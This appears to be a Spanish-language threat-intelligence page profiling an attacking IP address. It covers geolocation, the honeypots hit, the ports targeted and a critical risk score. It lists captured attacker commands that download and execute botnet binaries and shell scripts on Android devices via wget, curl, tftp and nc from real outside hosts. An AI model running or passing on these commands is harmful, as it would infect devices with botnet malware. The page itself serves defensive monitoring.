Amenaza Activa • CRÍTICO
130.12.180.18
2412
Ataques Totales
61
Puertos
6
Tipos Ataque
4
Malware
Geolocalización
- País
- 🇺🇸 Estados Unidos
- Ciudad
- Desconocida
- ASN
- AS214943
- ISP
- Railnet LLC
Tipos de Ataque
tanner
adbhoney
honeytrap
cowrie
dionaea
h0neytr4p
Puertos Atacados
345678081377772380886161661617555555565559888895304438000800180028003800480058006+41
Malware Asociado
Comandos Ejecutados
cd /data/local/tmp/; rm arm7 -rf ; busybox wget http://130.12.180.20:36695/arm7; chmod 755 arm7; ./arm7 adblocker;79x$
cd /data/local/tmp/; rm -rf received; toybox nc 91.224.92.14 9000 < /data/local/tmp > received; chmod 777 received;./received android_230x$
cd /data/local/tmp/; rm -rf received; nc 91.224.92.14 9000 < / > received; chmod 777 received;./received android_230x$
A=$(getprop ro.product.cpu.abi);[ "$A" = "x86_64" ]&&B=x86_64;[ "$A" = "x86" ]&&B=x86;[ "$A" = "arm64-v8a" ]&&B=arm64;[ -z "$B" ]&&B=arm7;cd /data/local/tmp;(busybox wget http://130.12.180.20:36695/$B -O $B||wget http://130.12.180.20:36695/$B -O $B||curl http://130.12.180.20:36695/$B -o $B||toybox wget http://130.12.180.20:36695/$B -O $B);chmod 777 $B;./$B floydbot &28x$
cd /data/local/tmp;rm -rf .a;(busybox wget http://130.12.180.20:36695/arm7 -O .a||wget http://130.12.180.20:36695/arm7 -O .a||curl http://130.12.180.20:36695/arm7 -o .a||toybox wget http://130.12.180.20:36695/arm7 -O .a);chmod 777 .a;./.a floydbot &27x$
cd /data/local/tmp/; rm -rf arm7; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod 777 arm7; ./arm7; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod 777 arm7; ./arm725x$
cd /data/local/tmp/;rm -rf w.sh; busybox wget http://130.12.180.20:36695/w.sh; sh w.sh; rm -rf c.sh; curl -O http://130.12.180.20:36695/c.sh; sh c.sh; rm -rf wget.sh; wget http://130.12.180.20:36695/wget.sh; sh wget.sh; curl -O http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox wget http://130.12.180.20:36695/wget.sh; sh wget.sh; busybox curl -O http://130.12.180.20:36695/wget.sh; sh wget.sh; rm -rf tftp.sh; busybox tftp -g -r tftp.sh 130.12.180.20 69; chmod 777 tftp.sh; sh tftp.sh25x$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7; curl http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm7; wget http://130.12.180.20:36695/arm7; chmod +x arm7; ./arm7; busybox curl http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm723x$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || /system/bin/wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || /system/xbin/wget http://130.12.180.20:36695/arm7 -O arm7 2>/dev/null || curl http://130.12.180.20:36695/arm7 -o arm7 2>/dev/null || busybox curl http://130.12.180.20:36695/arm7 -o arm7 2>/dev/null || /system/bin/curl http://130.12.180.20:36695/arm7 -o arm7 2>/dev/null || /syste21x$
cd /data/local/tmp/; busybox wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 proxy; curl http://130.12.180.20:36695/arm7 -o arm7; chmod +x arm7; ./arm7 proxy; wget http://130.12.180.20:36695/arm7 -O arm7; chmod +x arm7; ./arm7 proxy21xURLhaus Intel2 URLsabuse.ch
Esta IP ha usado las siguientes URLs maliciosas conocidas:
http://130.12.180.20:36695/w.shofflinemalware_downloadshua-wget
http://130.12.180.20:36695/wget.shofflinemalware_downloadshua-wget
Evaluación de Riesgo
95
/100
Bajo / Medio / Alto / Crítico